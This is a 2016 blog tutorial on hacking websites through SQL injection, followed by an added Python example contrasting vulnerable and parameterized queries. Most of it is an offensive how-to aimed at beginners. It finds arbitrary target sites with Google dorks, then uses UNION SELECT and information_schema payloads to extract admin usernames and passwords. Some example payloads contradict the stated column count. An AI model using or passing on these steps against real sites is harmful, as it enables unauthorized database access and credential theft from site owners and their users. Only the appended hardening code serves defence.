Saturday, September 24, 2016

Hack website by SQL injections

What is SQL Injection?

SQL Injection is the most famous hacking method and it is very easy to use. Even a beginner who is new to hacking can hack a website using this method. By using this method you can access the database (a database is a collection of data; it is used to store user ids, passwords, page details, login information, etc.). We can get all the details of a website using the database.

Follow Steps Given Below To Hack Website:

First of all you have to find a vulnerable website. We can find vulnerable websites from Google using Google dorks (a Google dork is a search string that helps you to find information that is not readily available on a website).

Some google dorks:

inurl:index.php?id=
inurl:order.php?id=
inurl:article.php?id=
inurl:login.php?id=
inurl:gallery.php?id=

You just have to copy and paste these dorks into Google and you will get a list of websites that we need for our next steps.

Step 1: Checking the vulnerability of a website. For this, you have to add a single quote (') at the end of the URL and hit enter.

For Example: http://www.qwertyuiop.com/index.php?id=6'

After hitting enter, if the page remains the same then you have to try another website, but if the website shows an error about the SQL query then it is vulnerable and you can use this website.

Step 2: Find the number of columns. To find the number of columns, we have to replace the single quote (') with order by n (n is an integer like 1, 2, 3, 4, 5, 6 and so on).

For Example: http://www.qwertyuiop.com/index.php?id=6 order by 1
http://www.qwertyuiop.com/index.php?id=6 order by 2
http://www.qwertyuiop.com/index.php?id=6 order by 3

Change the number until you get an error. If you get an error on number 6 then the number of columns is 5.

Step 3: Displaying the vulnerable columns: To display the vulnerable columns you have to add a "union select" column sequence. You have to replace "order by n" with union select and also change the id value to negative (id=2 to id=-2).

For Example: http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,4,5--

Now you will see some numbers on the page; they may be fewer than or equal to the number of columns. Select any one number; I recommend you choose a small number.

For Example: I took number 4.

Step 4: Finding version, database, user: Replace 4 with "version()".

For Example: http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,version(),5--

It will show a version like 5.0.1 or 4.3, something like this.

Now replace version() with database() and user() to find the database and user. Do the same as in the above step.

For Example: http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,database(),4,5--
http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,user(),4,5--

Step 5: Finding the table name: If the version is 5 or above then we have to find the table names of the database. Replace 4 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".

Now it will show you the list of table names. Look for a table name related to admin or user.

Select "admin" table.

Step 6: Finding the column name: In this step you have to replace "group_concat(table_name)" with "group_concat(column_name)".

Replace "from information_schema.tables where table_schema=database()-" with "from information_schema.columns where table_name=mysqlchar-".

Now you have to find and convert the table name to a MysqlChar() string and replace mysqlchar with that.

Find mysqlchar() for table name:

First of all install the HackBar addon in Mozilla Firefox, then select SQL -> MySQL -> MysqlChar(); this will open a small window. Now enter the table name you found (I am using the admin table name) and click OK.

Now you can see char(numbers separated with commas) in the HackBar toolbar.

Copy and paste the code at the end of the URL in place of "mysqlchar".

Now it will show the list of columns like admin, password, admin_id, admin_name, etc.
Now replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
columnname and anothercolumnname should each be replaced with a name from the listed columns.

Now replace "from information_schema.columns where table_name=CHAR(97,101,105,120)" with "from table_name".

Sometimes it will say the column name is not found; then try different column names.
After a lot of hard work you will get usernames and passwords.
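As an added example (not code from the original post), here is the server-side pattern every step above depends on, beside its hardened form. Python with an in-memory sqlite3 database stands in for the PHP/MySQL index.php?id= page; the table name articles and its rows are assumed.

```python
import sqlite3

# Constructed in-memory stand-in for the MySQL-backed "index.php?id=" page the
# post targets (assumption: a table "articles" with an integer id and a title).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(6, "Sixth article"), (7, "Seventh article")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    # The pattern the post exploits: the GET parameter is pasted straight into
    # the SQL text, so a stray quote breaks the grammar (step 1) and a UNION
    # appends rows the application never meant to return (steps 3 to 6).
    sql = "SELECT id, title FROM articles WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def lookup_hardened(conn: sqlite3.Connection, raw_id: str) -> list:
    # Two independent layers: reject anything that is not an integer, then bind
    # the value as a parameter so the database never parses it as SQL.
    try:
        article_id = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchall()

def leaks_sql_error(conn: sqlite3.Connection, raw_id: str) -> bool:
    # The single-quote check in step 1 only works because the page echoes the
    # database error to the visitor; a generic error page removes that signal.
    try:
        lookup_vulnerable(conn, raw_id)
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("quote probe raises a SQL error:", leaks_sql_error(db, "6'"))
    print("vulnerable:", lookup_vulnerable(db, "-6 UNION SELECT 1, 'injected'"))
    print("hardened:  ", lookup_hardened(db, "-6 UNION SELECT 1, 'injected'"))
```

The hardened lookup returns no rows for the union payload and for the quote probe, while the vulnerable one returns the attacker's row; sqlite's error on the stray quote plays the role of the MySQL error message the post looks for.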
